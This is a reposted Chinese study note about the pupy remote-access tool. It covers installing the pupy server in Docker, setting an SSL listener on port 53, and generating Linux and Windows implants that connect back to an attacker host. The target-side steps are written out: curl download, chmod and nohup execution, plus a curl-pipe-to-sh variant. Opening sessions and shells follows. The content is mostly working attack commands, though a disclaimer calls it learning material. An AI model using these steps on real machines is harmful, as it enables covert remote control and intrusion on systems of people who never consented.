首页 > 其他分享 >学习笔记-pupy

学习笔记-pupy

时间:2022-11-02 20:59:45浏览次数:93  
标签:pupy 笔记 rsa 53 学习 ssh test id

pupy

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

项目地址

相关文章

安装

Docker 安装

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
docker pull alxchk/pupy:unstable

systemctl stop systemd-resolved

# 端口映射
docker run -d --name pupy-server -p 2022:22 -p 53:53 -p 80:80 -p 443:443 -v /tmp/projects:/projects alxchk/pupy:unstable

# ssh-keygen 免交互
# yes | ssh-keygen -t rsa -N "" -C "[email protected]" -f ~/.ssh/id_rsa_pupy
# yes | ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa_pupy
yes | ssh-keygen -t rsa -N "" -C "[email protected]" -f ~/.ssh/id_rsa_pupy
cp ~/.ssh/id_rsa_pupy.pub /tmp/projects/keys/authorized_keys

# ssh首次交互免输入yes
ssh -i ~/.ssh/id_rsa_pupy -p 2022 -o stricthostkeychecking=no [email protected]

使用

进入 pupy 后

# remove监听器
listen -r ssl
# 监听 53 端口
listen -a ssl 53

# 生成 shell(linux)
gen -f client -O linux -A x64 connect --host x.x.x.x:53 -t ssl
# 生成 shell(windows)
gen -f client -O windows -A x64 connect --host x.x.x.x:53 -t ssl

# 进容器起py服务器
docker exec -it pupy-server /bin/sh
cd /projects/default/output/
python -m SimpleHTTPServer 8989

目标机器上线

curl http://x.x.x.x:8989/pupyx64.0E8pp4.lin -o test
chmod +x test
nohup ./test &

# curl http://x.x.x.x:8989/test|sh

pupy 上查看

# 成功连接后
sessions

sessions -i [id]
shell

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:pupy,笔记,rsa,53,学习,ssh,test,id
From: https://www.cnblogs.com/haidragon/p/16852390.html

相关文章

  • Doker学习01-Docker的基本概念
    Doker学习01-Docker的基本概念Docker概述Docker出现的原因一款产品有两个环境:开发(开发环境)和上线(运维环境)。环境配置和切换过于麻烦,每一台机器都要部署环境(集群Redis,E......
  • 学习笔记-merlin
    merlin免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.项目地址https://github.com/Ne0nd0g/merlin......
  • 学习笔记-Metasploit
    Metasploit注:笔记中拓扑图xmind源文件在其图片目录下免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与......
  • 学习笔记-Mimikatz
    Mimikatz免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.项目地址https://github.com/gentilkiwi/mim......
  • 学习笔记-ModSecurity
    ModSecurity免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.简介ModSecurity是一款开源的跨平台Web......
  • SpringBoot笔记:拦截器Interceptor和过滤器Filter
    一、拦截器InterceptorSpringBoot中定义拦截器与MVC中是一样的,区别在于拦截器的配置,MVC是配置在配置文件中的,SpringBoot中则是配置在配置类中的。(SpringBoot中的配置类需......
  • Vue学习-07
    一、Vue3介绍1、性能的提升打包大小减少41%初次渲染快55%,更新渲染快133%内存减少54%2、源码的升级使用Proxy代替defineProperty实现响应式重写虚拟DOM的实现和Tr......
  • 学习笔记-nuclei
    nuclei非常优秀的漏洞扫描工具,值得学习!免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.项目地址p......
  • 笔记3:多媒体嵌入与HTML表格
    多媒体与嵌入HTML的图片怎样将有一副图片放到网页上?使用<img>标签时,尽量将图片与HTML文档放在统一服务器的相同路径下.由于搜索引擎会读取images/下的图片文件名,所以......
  • 人生总有跌宕起伏,低潮时学习,高潮时发力
    文/王不留(微信公众号:程序员生存指南)  昨天和朋友吃饭。他已经毕业四年,在职场上走得很稳健,中规中距,没有走偏。 刚入职的一年里,完成了学生角色到职场人员的转变;第二年开......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99